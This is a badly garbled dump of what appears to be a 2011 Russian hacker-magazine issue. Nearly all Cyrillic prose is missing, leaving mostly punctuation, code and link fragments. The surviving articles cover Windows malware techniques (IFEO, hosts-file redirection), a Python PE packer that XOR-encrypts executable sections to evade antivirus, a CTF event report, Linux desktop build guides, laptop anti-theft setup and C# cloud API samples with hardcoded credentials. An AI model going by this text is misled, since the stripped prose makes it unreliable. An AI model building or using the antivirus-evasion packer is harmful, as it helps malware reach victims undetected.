HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options. , , .
,
. ,
,
,
.


. -

, , ,
.
.

-
. , ,
,
.
,
Windows. API- CreateWindowEx,
, ,
dwExStyle dwStyle, -
. ,
WS_EX_TOPMOST,

, , dwStyle

.
- ,
WM_CLOSE,
. , .
, WM_MOUSELEAVE ,
, , . ,
.
. , , , .
-. -
,
-
.
, Windows

-
.

. ,
,
.
, ,
, ,
, - . ,
shortcuts ,
.
. , WMI
(

). WMI , , , ,
.
, - , ,
. ,
,
.
.

hosts, %SystemRoot%\system32\drivers\etc\.

. , yandex.ru ip- , ,
. hosts ,
, .
. ip ,
- Squid, , , - .
IE COM-,
.
DNS- . ,
, DNS-. netsh

, - ,
, WMI.
, route
table. route, API CreateIpForwardEntry.
ip- ,
. ( , ), -
, . hosts
, .

. ,
, , . , IE
BHO. ,
-. ,
-
, ,
,
, .


, . , ,
.
, , .
,
, ,
. z


MALWARE
presidentua (http://tutamc.com)

, ,
!
EXE- Python

Web .
, .

. EXE- ,
:).
1.

,
, , . , -


,
, ,
PE-, . -
.

HTTP://WWW
links

Olly. , Olly,
XOR
.
! , , ( VirusTotal).

!
. ,
, -
PE-, ,
,
SandBox,
, .
, ,
GitHub,
http://github.com/presidentua/ExePacker.
,
. ++ VisualBasic,
,
. Python
, . ,
. !

2. PE-

PE- , ,

.
PE- , , ,
. Windowsa
, (,
DLL) ,
Entry Point.
, ,
.

3.

, .

pefile

http://github.com/presidentua/ExePacker

pefile http://code.google.com/p/pefile/
TornadoWeb
http://www.tornadoweb.org/

PE-,

http://code.google.com/p/pyew/

pefile
pefile ,
pe.__data__,
pe.__structures__. , . ,
, .
pe.write(filename=result.exe)
.
- , , ,
.
:
+ .
pe.__structures__.
:).

:), , ,
Putty.exe. :
1.
2.
3.
. .
, ,
.

Putty. .
:
1.
2.
2.1. ,
4.2
2.2.
3.
4.
4.1. ,
2.1
4.2. , 4.1 2.1,

.

DVD
dvd




PE,
.

,

INFO

info
?
Python
Gray Hat
Python.

WARNING
warning
,
.
,
-
:).


MALWARE


, ()
, .
, :
, +10;
+30;
Zeus +30;
4 +20;
-10.
,
EXE,
.
, 100, ,
.

4.

- . pefile (
), Putty:
import pefile
pe = pefile.PE("putty.exe")

, print pe,
,
. .
. ,
. - 512
. 1024 :
pe.add_last_section(size=1024)

IDE

1.
, ,
.
.
, , . ,

Windows API. , API.
:
Windows- ;
API
- ;
,
;
, Windows.
PS: ,
. Windows .

. , ,
FASM . pack.tpl.asm
:

XOR 1:
pe.sections[0].xor_data(code=1)

, ? :). ,
++!
, , .
pe.sections[0].
PointerToRawData, ,
pe.sections[-1].PointerToRawData:
pe.data_copy(pe.sections[0].PointerToRawData,
pe.sections[-1].PointerToRawData, 512)

, -


use32
mov eax, {{ go }}
jmp eax

, , , ,
TornadoWeb,
,
HTML-. :
asm = Template(open("pack.tpl.asm", "r").read()).generate(
go=pe.OPTIONAL_HEADER.ImageBase +
pe.sections[-1].VirtualAddress+512,
)
with open("pack.asm", "w") as f:
f.write(asm)

PE-

os.system(r"c:\fasmw\FASM.EXE pack.asm")

go ,
, , 512
. FASM.
:
new_pack = open("pack.bin", "rb").read()
pe.data_replace(offset=pe.sections[0].PointerToRawData,
new_data=new_pack)

copy.tpl.asm.
, .
, 512 ,
. .

:
copy_from = pe.OPTIONAL_HEADER.ImageBase+pe.sections[-1].\
VirtualAddress
copy_to = pe.OPTIONAL_HEADER.ImageBase+pe.sections[0].\
VirtualAddress
oep = pe.OPTIONAL_HEADER.ImageBase+pe.OPTIONAL_HEADER.\
AddressOfEntryPoint
asm = Template(open("copy.tpl.asm", "r").read()).generate(
copy_from=copy_from,
copy_to=copy_to,
copy_len=512,
xor_len=pe.sections[0].Misc_VirtualSize,
key_encode=1,
original_oep=oep,
)

,
, :
new_copy = open("copy.bin", "rb").read()
pe.data_replace(offset=pe.sections[-1].\
PointerToRawData+512, new_data=new_copy)

1.

, SandBox . ,
,
,
,
. .

2.


. ,
.
.
,
, ,
, DLL
.

pe.sections[0].Characteristics |=
pefile.SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"]
pe.OPTIONAL_HEADER.AddressOfEntryPoint =
pe.sections[0].VirtualAddress
pe.write(filename="result.exe")

5.

, 50 .
50 !
, ?
, , . ,
,
. ,
. ! z



c0n Difesa (condifesa@gmail.com, http://defec.ru)

POSITIVE
HACK
DAYS
2011

19
Positive Hack Days 2011, ,
, Positive Technologies.
.
PHD2011
(@devteev)
PT .
, .
phdays.com,
.
-, ,


, , :
, , Defcon BlackHat, , ,
HITB.

, , : ,

Capture the flag


,
.
,
PHD2011, , .
, , ,
.
,
.
:
1. -;
2. -;
3. ;
4. .

, . ,
(
) .


CTF. ,
(
PT: bit.ly/fjS0in)
,
, , . , ,
just 4 fun 900 ,
iPhone: , : ,

( 0-day
Safari,

) .
, ,
, , , .
.

Positive Technologies ,
,
.

, , PHD2011. (, ) -
. , , - , (
)
.
-
. , .
,
-,
.
, , , ,
:
,

.

DVD
dvd

CTF.

HTTP://WWW
links
,


PHD: phdays.ru .

:
devteev.blogspot.com .

Positive Technologies:
ptsecurity.ru.


PHD
. , PwC
,
: - -152 (
). ,
-,
IaaS (Infrastructure as a Service)
.
,
.
, jpeg-, ,
:
. ,
, . , ,
, ,
. , ,


,
,
.
,
The Anonymous
. ,

, , forensic-, , Group-IB, ,
.
, -


, ,
PT . . ? ,
-.
,
,
. -,
. ,
,
,
. . ,
. ,
, .

.
. ,
.
. , ,

.
. ,
,
, , .
, , ?. ,
,

0day
-
CTF: PPP . ,
, :).


PHD2011, CTF
HackQuest, Positive Technologies .

Lock picking - , .
.
) .

[]: - .
? .
, , PT, .
, .
?
[]: . , ,

[]: , CTF?

. .

[]: -

[]: , CTF ?.

( PT . .),

, ,

[]: PPP -

. .

: ,

[M]: CTF

, -

[]: .

[]:

150 , 50

(Positive Hack Days). ?

[M]: PHD 2011

[]: PHD 2012

non-stop.

?
[]: ,
, , ,
,
CTF, ,
.

[]: :
, ?
[E]: , ,
. just 4 fun, (

Positive Hack Days : ,


,
, . ,
, ,
.
.
, . z



Mifrill (mifrill@real.xakep.ru)



, ?
!
, , -,

. ,
,
.
ACM ICPC
:

:
cm.baylor.edu/welcome.icpc

( ACM/ICPC
ICPC) .
, .
70- .
, , ,
. ACM ICPC,
, IT-,
.
(ACM). 1989 , . , Apple, AT&T Microsoft,
1997
IBM.

- 1996-1997,
. :
, . ,


, , .
, .
. ,

:). ,
, .
C, C++ Java
. ,
, -
,
..
( ),
.
:
- ICPC $12 000. ,
, $6 000. , , $3 000., ,
$1 500. , IBM
: - ICPC 12 , IBM,
, ,
. , .

Facebook Hacker Cup


:

:
facebook.com/hackercup

(Facebook)

ICPC
.
Facebook Hacker Cup.
(2011 ), , .
20 2010
10 2011 . .
: .
, 7 2011 ( 0:00
UTC) 10 2011 ( 0:00 UTC).
, ,
72 . ,
, , 15-16 (3 3
). 1000 .
22 (
15:00 18:00 UTC). 300
( Hacker Cup) 25
. 25
: Facebook $5000
, $2000 , $1000
$100 4- 25-. , , ,
, , ,
Facebook -. , Facebook Hacker Cup , .

Top Coder
:

2528 2011

:
. Top Coder 2011 -, .

:
topcoder.com community.topcoder.com/tco11/
, TopCoder Inc.
( ),
Top Coder Open Top
Coder Collegiate Challenge ( ) . 2007 Top

Coder High School Tournament, .


Top Coder ,
. ,
,
.
TopCoder Inc
Test The Best Codeforces. Top
Coder Open ( Top Coder Invitational). ,
- . ,
, , ,
, 18 .
Top Coder 300 000 .
TopCoder c 2001
: Algorithm, Design, Development,
Marathon, Architecture, Assembly, Testing, Bug Races Studio.
Top Coder Open 2011 $150 000
100 - ( , ). Algorithm,
$15 000. ,
,
.
,
,
.

Google Code Jam


:

6 29 2011

:
. , 2011 Google

:
code.google.com/codejam
,
Google Code Jam. , -


ICPC

TopCoder Open

25 Facebook Hacker Cup 2011


Google, 2003 .
Google Code Jam ,
Google. -,
, IT-, ,
. :
,
. , , Google
Code Jam .
, Google-,

. , .
Google Facebook Hacker Cup:
$10 000, $2000,
$1000. 4 25
$100.

Google AI Challenge

Google Code Jam


2009

PlanetWars, Google AI
Challenge
C#, Java, Python, C++, Scala, PHP, Lisp, Haskell, OCaml,
CoffeeScript . , . 4600 112
. Google AI Challenge ,
, , , .
FAQ : .
. ,
:).

CodeCup
:

:
codecup.nl

:
ai-contest.com
Google ( )
. ,
. Galcon
. , -, : ,

. ,
.
. (
), . ,
, .


Google AI
Challenge. ,
Dvonn. , Google AI Challenge,
24/7 3 . ,
codecup.nl ( CodeCup
2011 , 2012 ).
, .
Linux,
-.
. 1.4 .
Pascal, C, C++, Java, Python, Haskell, Javascript
( ). ,
-, , ,
.

Facebook Hacker Cup

ICFPC
:

:
icfpcontest.org
. ICFP Contest , 1998 .
. ICFP (
) - ,
.
,

,

. , 72 (
). : lightning round ( , 24 ) main
round ( ).
(
Haskell, Objective Caml, C++, Cilk Java), . ICFPC
,
, .

AppUp Developer Challenge Intel


:

21

:
software.intel.com/ru-ru/articles/iadp-challenge-3
AppUp Developer Challenge ,
,
Intel Atom. 350
,
:
$60 .
, Alchemy

Facebook Hacker Cup


Top Coder Open


Classic. ,
Home Innovation Project AR Home.
$8 . , , : ,
. ,
, , ,
, .
, -
:
, MeeGo,
/
. ,
, :
, 700- ,
50
:). :
TED, ,
,
Comic-Con . z


UNIXOID
grinder (grinder@tux.in.ua)

KDE4
GNOME3
KDE GNOME , ,
. ,
, : , , . .

.
, KDE
SC 4.6.2, Ubuntu 10.10
4.5.1.
openSUSE 11.4, Gentoo Linux, FreeBSD, OpenBSD ..
, , .
, .


,
. : ,
,
, . ,
. , KDE GNOME.
Linux Mint 10 GNOME.
.
, .
,

KDE Ubuntu
Ubuntu KDE, ,
kubuntu-ppa/backports:
$ sudo add-apt-repository ppa:kubuntu-ppa/backports
$ sudo apt-get update
$ sudo apt-get install kubuntu-desktop

. , , /home.

sudo. admin ( Linux Mint).
.
~/.build-config,
(clck.ru/BZTg) ~/.bashrc. ,
. , 64- :
export LIB_SUFFIX=64

kdesdk, alias
make=makeobj. ,
PyKDE4 DBUS.
function cmakekde,
cmake. ,
:
cmake $KDE_BUILD \
    -DCMAKE_INSTALL_PREFIX=$KDEDIR \
    -DCMAKE_BUILD_TYPE=debugfull \
    -DKDE4_BUILD_TESTS=TRUE
nice make -j2
make install

'-j' (X+1), CPU.


KDE ,
$KDEDIR.
kdesrc-build (kdesrc-bld.kde.org) build-tool.
KDE . ,
,
~/.kdesrc-buildrc. , .
$ cp ~/kdesrc-build-1.13/kdesrc-buildrc-sample \
~/.kdesrc-buildrc

.
, . ,
:
kde-languages ru

:
module <module-name>
end module

:
$ sudo ./kdesrc-buildrc

, , , .
, ,
, '--no-svn'.
'--pretend', . , , '--refresh-build'
,
. kdesrc-build Perl libwww. , .
, qt-copy, kdesupport, kdelibs, kdepimlibs, kdebase
7 , 20
.
.

KDE,
.
~/kde. ~/kde/src , ~/kde/build . , cs cb,
.
kubuntu-ppa/backports, :
$ sudo apt-get install apt-build


.
$ sudo apt-build install kubuntu-desktop

, /etc/apt/apt-build.conf. , ,
,
. apt
, , :
$ sudo apt-get source kubuntu-desktop
$ sudo apt-get build-dep kubuntu-desktop

, ,
. , build-essential, cmake, doxygen, . ,
, - . ,
libxine-dev, KDE
. Git (quickgit.kde.org) (ftp.kde.org/pub/kde). SVN,
. :


UNIXOID


apt-build
$ nano ~/.gitconfig
[url "git://anongit.kde.org/"]
insteadOf = kde:
[url "git@git.kde.org:"]
pushInsteadOf = kde:

. , , :
$ git clone kde:kdelibs
$ git clone kde:kde-workspace
$ git clone kde:kdepimlibs

, kdemultimedia,
kdeartwork, extragear .
Qt. .
KDE', , KDE,
..
$ git clone kde:qt-kde

Gitorious, Qt :
// Qt
$ git clone git://gitorious.org/qt/qt.git
//
$ git clone \
git://gitorious.org/+kde-developers/qt/kde-qt.git

~/.bashrc ~/.build-config,
, :
$ sudo cmakekde

,
:

cmake

, , , . , , , ,
. , add_subdirectory() add_optional_subdirectory() CMakeLists.txt
.
, ,
. ,
,
, .
strigi nepomuk,
kdepim-. , KWin OpenGL .
Akonadi 20%
. , KDE3, .
raster trace qt-gui,
, , 30 .
: USE- (gentoo.org/dyn/use-index.xml) ,
. ,
Gentoo XZ-, KDE4
200 (1,8 2 ). ,
. , kwin
openbox- .
Antico, Qt4/X11
+ ( KDE+KWin). kdelibs,
. , KDE. 0.2
. Antico Git:
$ git clone git://github.com/antico/antico.git

cd $KDE_BUILD
for dir in
kdelibs
kdepimlibs
... ..
;
do cd $KDE_BUILD/$dir; cmakekde 2> /dev/stdout; done

KDE cmake, ./configure,


, .
cmake
CMakeLists.txt *.cmake.
.


GDM KDM, /usr/sbin/kdm /etc/X11/default-display-manager.
~/.xsession ~/.xinitrc startkde . , Debian,
/etc/alternatives.
x-window-manager ,
x-session-manager . /usr/share/xsessions/kde4.desktop :
$ sudo nano /usr/share/xsessions/kde4.desktop
Exec=$HOME/kde/bin/startkde

~/.jhbuildrc. , .
$ cp examples/sample.jhbuildrc ~/.jhbuildrc

, ,
, , .
live.gnome.org/Jhbuild/Modulesets. ,
, ,
. :

JHBuild

TryExec=$HOME/kde/bin/startkde
Name=KDE4

GNOME3

, , , ,
. GNOME
3.2.
,
Live-: openSUSE Fedora (gnome3.org/tryit.html).
openSUSE 11.4, Ubuntu 11.04 Natty Narwhal Fedora 15.
, ,
Linux Mint, PPA- GNOME 3 Stack.
, Gtk+ 3.
$ sudo add-apt-repository ppa:ubuntu-desktop/gnome3-builds
$ sudo apt-get update
$ sudo apt-get install gnome3-session

$ nano ~/.jhbuildrc
repos['git.gnome.org'] = 'ssh://user@git.gnome.org/git/'
moduleset = 'gnome-suites-core-3.0'
modules = [ 'meta-gnome-desktop' ]
checkoutroot = os.path.expanduser('~/checkout/gnome')
prefix = '/opt/gnome'
# CFLAGS
# os.environ['CFLAGS'] = '-Wall -g -O0'
# '--disable-static --disable-gtk-doc'
#autogenargs=''
makeargs = '-j2'

:
$ jhbuild sanitycheck

, . :
jhbuild ,
, ,
, jhbuild sanitycheck.
live.gnome.org/JhbuildDependencies ( : m4, Perl, Python GCC).
, ,
.

bootstrap:

$ gnome-shell --replace

, GNOME3.
, , Linux Mint .
APT .
Git- (git.gnome.org) FTP- (ftp.gnome.org/pub/GNOME).
GNOME
Python JHBuild (developer.gnome.org/jhbuild).
Git ( gnome-common):
$ git clone git://git.gnome.org/jhbuild
$ cd jhbuild
$ make -f Makefile.plain
$ make -f Makefile.plain install

JHBuild , PATH ~/.local/bin.


$ echo PATH=$PATH:~/.local/bin >> ~/.bashrc


$ jhbuild bootstrap

sanitycheck , ,
:
$ jhbuild build

JHBuild ,
~/.jhbuildrc . ,
, ,
(, , ..).
JHBuild
:
$ jhbuild build gtk+

, KDE4 GNOME3
. ( ) , . ,
, . z


UNIXOID
(execbit.ru)

Must have-

,
,
.

?
, :
1.
, . , - , ,
.
2. , ,
.
3. ,
, , .
, ,
.
4. : ( ) ,


, ,
. , -
.
5. , - ,
- .
,
, Linux, -,
. . ,
.

,
. ,
.


, encfs
.
, . , , .
,
rsync, sp git,
, ,
(
).
, .
Dropbox,
,
, .
, .
Dropbox ,
, ,
(
delta-, ).
Dropbox . -,
,

( Dropbox ,

, ),
-,
(2 ), .
,
Unison,
Dropbox,
(GTK CLI), ,
,
.

SSH- ()
IP-,
. ,
. Unison :

( default),
.
,
(SSH), .
,
.
Go.
Unison
, cron:
$ echo "*/10 * * * * /usr/bin/unison -auto -batch" | crontab -

, . ,
, , .
,
. ,
, . :

gsynaptics

INFO

info
ArchLinux

webfs
:
$ yaourt -S quickserve
$ quickserve ///


:
$ cd ///
$ python -m SimpleHTTPServer


:
$ synclient TouchpadOff=1

$ sudo apt-get install unison


(). :
$ unison-gtk2

UNIXOID

Prey?

Windows

Prey :
, , (
) ,
, . ,

. Ethernet
Linux
DHCP ( ,
). WiFi :
,
,
.
, c
.


.

,
( , ).
,
Windows.
Linux, , ,
Prey .
dual-boot, Windows
, Prey (,
Prey ,
Android).

, ,
, ,
.
, ,
,
,
.
: ( )
(
, )
. ? :
:
1) encfs, (,
TrueCrypt dm-crypt, );
2) Prey, , web- ..
encfs. ,
:
$ sudo apt-get install encfs

, . ~/.crypto:
$ mkdir ~/.crypto

/
. ~/decrypto:
$ mkdir ~/decrypto

encfs:
$ encfs ~/.crypto ~/decrypto

p. . , decrypto,
, ~/crypto.
.
:
$ fusermount -u ~/decrypto
$ ls -l ~/.crypto ~/decrypto

decrypto ,
. , , web-:


$ mv ~/.config/chromium ~/decrypto
$ ln -s ~/decrypto/chromium ~/.config/chromium

, , encfs , .
, encfs
pam_mount ,
, .
, ,
. :
$ vi ~/bin/encfs_mount.sh
#!/bin/sh
ENC=/home/vasya/.crypto
DEC=/home/vasya/decrypto
# If the encfs volume is already mounted, offer to unmount it;
# otherwise ask for the password and mount it.
if grep encfs /proc/mounts | grep -q "$DEC"; then
    zenity --title="encfs" --question --text=" encfs?"
    if [ $? -eq 0 ]; then
        fusermount -u "$DEC" &
    fi
else
    zenity --entry --hide-text --title="encfs" \
        --text="?" | encfs -S "$ENC" "$DEC"
fi

(chmod +x ~/bin/encfs_mount.sh)
.
~/.config/autostart,
. Prey.
, , , e-mail. ,
, WiFi
GPS-, , , traceroute, ,
, web-. ,
,
: , , , , ,
, ,
. ,
(preyproject.com) Linux-.
0.5.3.
/usr/share:

Prey
$ cd /usr/share
$ sudo unzip ~/prey-0.5.3-linux.zip

, web-,
Prey ,
control.preyproject.com, , Add
new device, ,
Information to gather ( ). Device information,
,
Prey, .
/usr/share/prey/config :
device_key=''

Account , API Key, :


api_key=''

Prey , ,
:
$ sh prey.sh --check

, . ,
, Prey ,

(, , ).
Prey cron, 10
:

keytouch
$ sudo su
$ echo "*/10 * * * * /usr/share/prey/prey.sh > /var/log/prey.log" | crontab -

,
Missing
YES. Prey .
,
New report!.
Prey
( ,
), , ,
Prey , ,

UNIXOID

web- Linux
:
$ mplayer tv://
s:
$ mplayer tv:// -vf screenshot
:
$ mencoder tv:// -ovc lavc -o webcam.avi

slim ,
/etc/slim.conf:

, Prey,
10
e-mail. , ,
web-, /
Prey
(, laptop_missed.html site.com, Prey, ,
e-mail).
,
:
$ sudo vi /usr/share/prey/config
#
check_url='http://site.com/laptop_missed.html'
#
missing_status_code='200'
# e-mail
post_method='email'
#
mail_to='vasya@gmail.com'
smtp_server='smtp.gmail.com:587'
smtp_username='vasya@gmail.com'
smtp_password=''

: ,
-
( Ethernet- WiFi).
, gdm (Gnome)
kdm (KDE). gdm /etc/gdm/custom.conf
:
$ sudo vi /etc/gdm/custom.conf
[daemon]
TimedLoginEnable=true
AutomaticLoginEnable=false
TimedLogin=vasya
AutomaticLogin=vasya
TimedLoginDelay=5
DefaultSession=gnome

kdm /usr/local/share/config/kdm/kdmrc
:
$ sudo vi /usr/local/share/config/kdm/kdmrc
NoPassUsers=vasya
DefaultUser=vasya
AutoLoginUser=vasya


$ sudo vi /etc/slim.conf
default_user vasya
auto_login yes


, .
, .
Linux SMB-
(Samba), Windows-.
, , ,
- FreeBSD,
.
FTP HTTP. ,
FTP,
ftp-:
$ sudo apt-get install vsftpd

/home/ftp (
pub, ).
web-:
$ sudo apt-get install webfs
$ webfsd -p 8080 -r ///

http://IP-:8080.

, - .

.
, , .
xmodmap, .
keytouch
(keytouch.sf.net),
.
,
:
$ sudo apt-get install keytouch


/. , ,
( ).

Dropbox, Unison
, . :
synaptics,
Linux
gsynaptics ( ,
synclient,
X.org).
$ sudo apt-get install gsynaptics

.
.
,
.

,
.
,
powertop, , .
:
$ sudo apt-get install powertop
$ sudo powertop

, top- .

,
.
, .
, , ( ,
).
(WiFi-, )
.
jupiter,
,
.
, :
$ sudo apt-get install jupiter

. ,
,
:
.
( ) WiFi.
.
/ .

,
, . ,
. z


UNIXOID
Adept (adeptg@gmail.com)

LibreOffice
Mageia

Linux Mint

OpenSource. ,
, , , - .
.

LibreOffice . , ,
OpenOffice Sun. : , ,
, Sun
upstream.
, .
( , , Novell)
OOo, . Go-OO
VBA-,
Microsoft OOXML, .
(SUSE, Debian, Ubuntu )


Go-OO. ,
Go-OO ,
,
OpenOffice.
, OpenOffice Sun .
, Oracle Sun.
, . Oracle
,
,
Document Foundation. -
(
). Document Foundation
, FSF,
OASIS, GNOME Foundation, Google, Novell, Red Hat, Canonical
( 2011 39 goo.gl/UqGHN). Oracle

Mageia

LibreOffice Writer OpenOffice Writer

LibreOffice
,
OpenOffice.org.
Oracle ,
Document Foundation OpenOffice.org.
, LibreOffice.
.
Document Foundation
(28 2010 ) -
LibreOffice 3.3.0 ( OOo), , ,
Go-OO. : wiki, IRC, ( 13
, ). - 80000 . 45 ( 25 ).
, IRC- 100 ,
14000.
,
. Twitter .

, 20 fulltime (Red Hat,
Novell, Canonical).
5 2011
1,3 .
3.3 Document Foundation
,
. (50000 )
8 !
LibreOffice 3.3 OpenOffice.org
3.3 ( ,
,
,
Calc 65000 1 ), :
SVG;


(Writer);

(, <F5>),
,
;
MS Works Lotus
Word Pro, WordPerfect;
, (, ),
.
LibreOffice () ;

: Calc A1, Excel A1 Excel R1C1;
ODS, Excel DBF; Excel,
pptx.
LibreOffice 3.3
OpenOffice : Ubuntu 11.04,
Fedora 15, openSUSE 11.4, Mandriva 2011. LibreOffice
Google Summer of Code 2011
( ,
, Visio-).

HTTP://WWW
links
goo.gl/AWH2p
Document
Foundation
goo.gl/DT6z8
changelog
LibreOffice 3.3
goo.gl/9RhuB

LibreOffice Google
Summer of Code 2011
goo.gl/8Gkft
Icinga
Nagios

OpenSource , -
. , ,
.
, .
mplayer (, ,
10 ). mplayerxp,
( , mplayer

). mplayerww Windows-only, ,
PMP (PlayStation Portable),
DSP- winamp
.
mplayer2.
,
:
. mplayer
.
mplayer2 ;


UNIXOID

, , :

.
.
Gosa FusionDirectory. Gosa
- LDAP
, , ,
. : Gosa ,
, GONICUS GmbH,
(, )
.
Redmine
.
ChiliProject, 2011 .
( ,
upstream) ,
ChiliProject community. ,
.
Hudson
Sun, Oracle.
2010 (java.net)

( ).
, github,
Jenkins ( Oracle
Hudson). , Oracle
Hudson ,
Eclipse Foundation.
Enterprise- OpenSource . , Nagios,
Icinga.
Nagios Enterprises.
Icinga
, :
- C
, PHP Ajax;
.
( LDAP);
IPv6,
IPv6/IPv4-;
API (XML, JSON, SOAP);
-.
Icinga
Nagios.
.
FPS Nexuiz. (Lee Vermeulen), ,

Illfonic. (
GPL)
.
Xonotic.
,
.

Firefox 2 .
Mozilla Application Suite ;
X.Org XFree86, , , -
;
Ubuntu Debian, 1
;
OpenBSD BSD. ,
NetBSD, 1995 -
;
Joomla CMS,
- CMS Mambo.

Matroska;
;
Nvidia VDPAU,
GPU;
FFmpeg,
FFmpeg API;
mencoder ( ,
, ).
- , ,

mplayer2;
GUI-.
- 2.0,
mplayer. ,
,
,

.
GUI mplayer .
UMPlayer, SMPlayer. 1.0, ,
,
. ,
Windows Linux, Mac OS X. :
CSS.
;
, Youtube;
SHOUTcast-;
opensubtitles.org.
.
, . .
, FFmpeg
. ,
git,
,
. ,
, ,
, , , . , .
,
. Libav.

.


,
/.
Mandriva 30
. ,

ChiliProject

UMPlayer

Ubuntu KDE 3.5


Linux Mint
Mageia, . Mandriva 2010.1:
, OpenOffice
LibreOffice.
, ,
:
( 10000 ),
(, wiki), , , , IRC-
. , . . , Mandriva Mandriva 2011,
. , -
.
Android
IcedRobot,
. Dalvik Virtual Machine
( Java, Android) OpenJDK
( Java, GPL),
.
Dalvik ,
Android .
, Dalvik
OpenJDK. :
Android- ,
OpenJDK;
OpenJDK ( ,
).
.
- Debian,
Ubuntu,
.
Ubuntu
Linux Mint,

Ubuntu ( , distrowatch.com
). ,
11 ( Katya),
Ubuntu 11.04 Unity ( Gnome 2.32), (
flashplayer, unrar) ( DVD-),
:
mintMenu GNOME;
mintInstall ,
Ubuntu;
mintUpdate ;
mintBackup .
, DE , . ,
.
.
KDE 3.5. KDE4 KDE
. 3.5, Trinity Desktop Environment.
, , : , Qt4 HAL udev. (www.trinitydesktop.org)
Debian/Ubuntu, RPM-
RedHat/Fedora OpenSUSE .

To fork or not to fork

. ,
, , .
, , X.Org, 2004
XFree86 - .
. GCC. 1997
EGCS, . ,
GCC EGCS. z


CODING
(antonov.igor.khv@gmail.com, http://vr-online.ru)



Dropbox, VK, Flikr Facebook

, , Facebook -
. ? ?
,
. ? ? .
?

.
. ,
. ,
?, . ,
, . ,
..
. ,
. . ,
,
. -


( )

. . .
,
, . .
www.vr-online.ru , Twitter .

. , . ?! , .
, .
.
.

1. DropBox

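DROPBOX
// DropBox.DropBoxCredentials holds the application keys
// and the account data used to sign in to DropBox
DropBox.DropBoxCredentials myCredentials =
    new AppLimit.CloudComputing.SharpBox.DropBox.DropBoxCredentials();
// Application key received when the application was registered
myCredentials.ConsumerKey = "kxsdqll7p11dtcy";
// Application secret received together with the key
myCredentials.ConsumerSecret = "dhw5dvlrmxw62oe";
// Account name and password of the user
myCredentials.UserName = "anton@gmail.com";
myCredentials.Password = "13241414";
// Standard DropBox configuration
DropBox.DropBoxConfiguration myConfiguration =
    DropBox.DropBoxConfiguration.GetStandardConfiguration();
CloudStorage myStorage = new CloudStorage();
// Open the connection and stop if that fails
if (!myStorage.Open(myConfiguration, myCredentials))
{
    MsgBox(" !");
    return;
}
// Connection is ok, upload and download a file
myStorage.UploadFile("article_for_x.txt",
    "/MyPublicDirectory");
myStorage.DownloadFile("/MyPubarticle_for_x.txt ",
    "C:\\");
// Close the connection if it is still open
if (myStorage.IsOpened)
    myStorage.Close();

2. Facebook C# SDK CodePlex

AUTH
using System;
using System.Diagnostics;
using TweetSharp;
// Create the service with the application's consumer key and secret
TwitterService service =
    new TwitterService("_", "_");
// Get a request token
OAuthRequestToken requestToken =
    service.GetRequestToken();
// Build the OAuth authorization url and open it in the browser
Uri uri = service.GetAuthorizationUri(requestToken);
Process.Start(uri.ToString());
// Exchange the request token and the PIN for an access token
string verifier = "123456"; // PIN shown to the user
OAuthAccessToken access =
    service.GetAccessToken(requestToken, verifier);
// Authenticate further calls with the access token
service.AuthenticateWith(access.Token, access.TokenSecret);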

web-. www.vr-online.ru.
.
. ,
, .
,
( ).

IEnumerable<TwitterStatus> mentions =
service.ListTweetsMentioningMe();

,
.
. ,

. ,
.

. , ,
. .
. ,
ICQ- (,
?). ,
, FB ..
,
( ). ,
.
, . ,
. ,
.
, .
-


CODING

3.
Facebook
Developer Toolkit

. ,
web-.

, ,
. . ,

. ,
. ,
. , , , .
.
.
, . . , , API? ,
.
. , ,
.
,
, .
, ? ! -,
, . , . , -.
,
.
. , , .


DropBox (dropbox.com). ,
DropBox, . DropBox ,
.
DropBox , . .
, DropBox
. , 2


. ?!
? , ,
, , DropBox
.
.
,
. ,
. , . ,
DropBox ,
. , API, .
C#, SharpBox
(sharpbox.codeplex.com). ,
DropBox .

DropBox. , 31 2010
.
, .
,
, .
, DropBox,
(https://www.dropbox.com/developers/apps). application AppKey
AppSecret. ,
. , , VS, SharpBox
, . DropBox
.
DropBox.
.
(. ).

, .

Twitter. , , ,
, . ,
.
, .


-
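using System;
using System.Collections.Generic;
using TweetSharp;
// Create the TwitterService without credentials:
// the public timeline can be read anonymously
TwitterService myTwitterService = new TwitterService();
IEnumerable<TwitterStatus> tweets =
    myTwitterService.ListTweetsOnPublicTimeline();
// Print every tweet as: author "text"
foreach (var tweet in tweets)
{
    Console.WriteLine("{0} \"{1}\"",
        tweet.User.ScreenName, tweet.Text);
}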

. - ,
.
TwitterSharp. ,
.NET (2-4), Mono 2.6, Windows
Phone 7. WP7 .
, .
Twitter-
. Twitter-Sharp
, , , OAuth,
. .
, , .
. , .

, .
, ,
, . ,
.
, .
SDK

. , ,
. ,
Alfa, .
, , Silverlight vkontakte
API (silverlightvkapi.codeplex.com).
( , ..).
, .

Flickr

Flickr ,
, Yahoo.
, .
,
. Wikipedia, .
,
CodePlex FlickrNET API Library
(flickrnet.codeplex.com). ,
Flickr .
, DVD.


sharpbox.codeplex.com/documentation , DropBox
SharpBox.
sharpbox.codeplex.com
DropBox.
tweetsharp.codeplex.com
tweetsharp.
shorturlcreator.codeplex.com
.
? .
svapi.codeplex.com SilverLight API Connector .
ggltranslate.codeplex.com Google.
vkontakte.ru/developers.php
.
www.vr-online.ru/page/vr-online-dekabr-yanvar-3171
VROnline ,
Google
. .

Facebook

Facebook ,
:). ,
, .
, Facebook SDK, .. CodePlex, Facebook
/
. . ,
. ,
Facebook C# SDK (facebooksdk.codeplex.com) Facebook Developer
Toolkit (facebooktoolkit.codeplex.com).
/web/Silverlight-,
Facebook.
Windows Phone 7, ,
must have!
, . ? , Facebook C# SDK, FDT
.
Facebook,
www.facebook.com/#!/developers/
application.
DropBox. , , .
. FDT,
. FDT
, ..
. .


. , , SDK . ,
,
.
, . . ! z


CODING
(seva@vingrad.ru)

Mac OS X
,

. ,
, Mac OS X
, .
Intro

Mac OS, Apple HFS (Hierarchical File System).


HFS+, Mac OS,
8.1. , HFS+,
HFS, .
:


HFS
31
Mac Roman
512
2^31

HFS+
255
Unicode
4 K
2^63

, HFS+ ,

HFS+


HFS+ . , , journalInfoBlock , ,
allocationFile-,
, catalogFile .

HFS+

HFS .
16 , ,
65536 ,
. ,
.
HFS+ 32 ,
.
HFS+
.
:
Volume header ( ).
. , .
Allocation file ( ). Bitmap,
. (1 , 0
.)
Catalog file ().
.
Extents overflow file. , .
Attributes file ( ). ..
Journal file (). , .
Catalog file, extents overflow file attribute file
B-.
1024 .

HFS+
struct HFSPlusVolumeHeader
{
